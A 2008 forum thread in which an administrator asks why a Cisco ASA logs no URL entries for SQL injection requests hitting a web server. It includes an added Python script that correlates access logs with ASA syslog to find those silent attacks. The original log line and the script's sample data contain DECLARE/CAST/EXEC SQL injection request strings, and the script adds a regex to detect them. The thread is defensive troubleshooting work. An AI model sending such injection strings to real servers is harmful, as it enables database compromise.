ASA not logging certain requests?

Unanswered Question
Jul 23rd, 2008

I have a bunch of attack requests not being logged by my asa-5550 version 7.2(4)


On my web-server I see an attack:

B.A.D.IP; HTTP/1.0 - [23/Jul/2008:11:37:30 -0700] GET /downloads/file/fid?;[email protected]%20CHAR(4000);[email protected]=CAST(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%20AS%20CHAR(4000));EXEC(@S); HTTP/1.0 500 4635; null; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)


The only thing I see in the ASA logs is:

Jul 23 11:37:29 192.168.22.254 %ASA-7-609001: Built local-host outside:B.A.D.IP

Jul 23 11:37:29 192.168.22.254 %ASA-6-302013: Built inbound TCP connection 1803718934 for outside:B.A.D.IP/2668 (B.A.D.IP/2668) to inside:192.168.10.100/80 (G.OO.D.IP/80)

Jul 23 11:37:29 192.168.22.254 %ASA-6-302013: Built inbound TCP connection 1803718936 for outside:B.A.D.IP/2669 (B.A.D.IP/2669) to inside:192.168.10.100/80 (G.OO.D.IP/80)

Jul 23 11:37:30 192.168.22.254 %ASA-6-302014: Teardown TCP connection 1803718936 for outside:B.A.D.IP/2669 to inside:192.168.10.100/80 duration 0:00:01 bytes 4123 TCP FINs

Jul 23 11:37:30 192.168.22.254 %ASA-6-302014: Teardown TCP connection 1803718934 for outside:B.A.D.IP/2668 to inside:192.168.10.100/80 duration 0:00:01 bytes 4122 TCP FINs

Jul 23 11:37:30 192.168.22.254 %ASA-7-609002: Teardown local-host outside:B.A.D.IP duration 0:00:01



Usually I'll get the ASA logs (%ASA-5-304001) that I can grep for and see all of the 'Accessed URL' lines. For some reason none of these attacks are being logged. I'm concerned that not only are they getting through, they are doing so silently.

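One way to turn the check described in the post into something repeatable is to correlate the web server's access log with the ASA syslog: every request the web server served should have a 302013 "Built inbound TCP connection" from the same client around the same time, and (with URL logging on) a 304001 "Accessed URL" for the same path. Requests that match the injection idiom shown above, have a connection but no 304001, are exactly the "passed silently" cases. The script below is an added example, not code from the original post or from Cisco; the log lines in it are constructed (RFC 5737 addresses, a generic CAST/EXEC payload), the 304001 body layout `<src> Accessed URL <dst>:<url>` is assumed and should be adjusted to what the ASA actually emits, and it assumes the firewall and the web server keep the same local time.

```python
import re
from datetime import datetime, timedelta
from urllib.parse import unquote

# Constructed sample logs (not the original poster's data). Same client, two
# connections: a normal page fetch the ASA reports with 304001, and an
# injection attempt for which only the 302013/302014 connection messages exist.
ASA_SYSLOG = """\
Jul 23 11:37:29 192.168.22.254 %ASA-6-302013: Built inbound TCP connection 1803718934 for outside:203.0.113.9/2668 (203.0.113.9/2668) to inside:192.168.10.100/80 (198.51.100.7/80)
Jul 23 11:37:29 192.168.22.254 %ASA-5-304001: 203.0.113.9 Accessed URL 192.168.10.100:/index.html
Jul 23 11:37:29 192.168.22.254 %ASA-6-302013: Built inbound TCP connection 1803718936 for outside:203.0.113.9/2669 (203.0.113.9/2669) to inside:192.168.10.100/80 (198.51.100.7/80)
Jul 23 11:37:30 192.168.22.254 %ASA-6-302014: Teardown TCP connection 1803718936 for outside:203.0.113.9/2669 to inside:192.168.10.100/80 duration 0:00:01 bytes 4123 TCP FINs
Jul 23 11:37:30 192.168.22.254 %ASA-6-302014: Teardown TCP connection 1803718934 for outside:203.0.113.9/2668 to inside:192.168.10.100/80 duration 0:00:01 bytes 4122 TCP FINs
"""

WEB_ACCESS_LOG = """\
203.0.113.9 - - [23/Jul/2008:11:37:29 -0700] "GET /index.html HTTP/1.0" 200 512
203.0.113.9 - - [23/Jul/2008:11:37:30 -0700] "GET /downloads/file/fid?;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245%20AS%20CHAR(4000));EXEC(@S); HTTP/1.0" 500 4635
"""

ASA_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2} +\d{1,2} \d\d:\d\d:\d\d) \S+ %ASA-\d-(?P<msgid>\d{6}): (?P<body>.*)$")
CONN_RE = re.compile(
    r"Built inbound TCP connection \d+ for \w+:(?P<src>[\d.]+)/\d+ .* to \w+:(?P<dst>[\d.]+)/(?P<dport>\d+)")
# Assumed 304001 body layout "<src> Accessed URL <dst>:<url>"; adjust to your ASA's exact text.
URL_RE = re.compile(r"(?P<src>[\d.]+) Accessed URL (?P<dst>[\d.]+):\s*(?P<url>\S+)")
# Apache/IIS-style combined access log: client, timestamp, request line, status.
WEB_RE = re.compile(
    r'^(?P<src>[\d.]+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3})')
# The DECLARE / CAST(0x... AS CHAR) / EXEC(@...) idiom used by mass SQL injection bots.
SQLI_RE = re.compile(
    r"DECLARE\s+@\w+|CAST\s*\(\s*0x[0-9A-Fa-f]+\s+AS\s+N?CHAR|EXEC\s*\(\s*@", re.I)


def parse_asa_time(text):
    # Syslog carries no year; strptime leaves it at 1900, and the web time is
    # normalised to the same year below so the two can be compared.
    return datetime.strptime(text.replace("  ", " "), "%b %d %H:%M:%S")


def parse_web_time(text):
    # "23/Jul/2008:11:37:30 -0700": drop the offset (assumed equal to the ASA's
    # local time) and the year.
    return datetime.strptime(text.split()[0], "%d/%b/%Y:%H:%M:%S").replace(year=1900)


def load_asa(asa_text):
    """Collect (ts, src, dst) from 302013 lines for port 80 and (ts, src, dst, url) from 304001 lines."""
    conns, urls = [], []
    for line in asa_text.splitlines():
        m = ASA_RE.match(line)
        if not m:
            continue
        ts = parse_asa_time(m["ts"])
        if m["msgid"] == "302013":
            c = CONN_RE.search(m["body"])
            if c and c["dport"] == "80":
                conns.append((ts, c["src"], c["dst"]))
        elif m["msgid"] == "304001":
            u = URL_RE.search(m["body"])
            if u:
                urls.append((ts, u["src"], u["dst"], u["url"]))
    return conns, urls


def correlate(asa_text, web_text, window=timedelta(seconds=5)):
    """For each web-server request, record whether the ASA built a connection from
    that client within `window` and whether it logged a 304001 for the same path."""
    conns, urls = load_asa(asa_text)
    results = []
    for line in web_text.splitlines():
        w = WEB_RE.match(line)
        if not w:
            continue
        ts = parse_web_time(w["ts"])
        path = w["url"].split("?", 1)[0]
        results.append({
            "src": w["src"],
            "path": path,
            "status": int(w["status"]),
            "suspicious": bool(SQLI_RE.search(unquote(w["url"]))),
            "connection_seen": any(abs(t - ts) <= window and s == w["src"] for t, s, _ in conns),
            "url_logged": any(abs(t - ts) <= window and s == w["src"] and path in u
                              for t, s, _, u in urls),
        })
    return results


def silent_attacks(asa_text, web_text):
    """Injection attempts the ASA passed (connection built) without a matching 304001."""
    return [r for r in correlate(asa_text, web_text)
            if r["suspicious"] and r["connection_seen"] and not r["url_logged"]]


if __name__ == "__main__":
    for r in silent_attacks(ASA_SYSLOG, WEB_ACCESS_LOG):
        print(f"{r['src']} {r['path']} HTTP {r['status']}: passed by ASA, no 304001 logged")
```

Run against real files by reading the syslog and access log into the two strings; the 5-second window absorbs clock skew between the two hosts, and the `connection_seen` flag separates "the firewall never saw it" from "the firewall saw it and did not log the URL", which is the distinction the post is trying to make.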
w-schultz Tue, 07/29/2008 - 06:20

Thank you for the response.


I am well aware of the logging types; the problem is that I'm not receiving the logging message 304001 for the given URI. I receive them for all other URIs, just not this specific attack.


My thought is that the ASA signature swallows it, does not send it to syslog, and then passes it on to the web server. I'm okay with it passing it along but it seems a little odd that it does not get logged.


I was getting many of these requests and see them on all of my webservers but not one shows up in my syslog while all the other 304001 do show up.
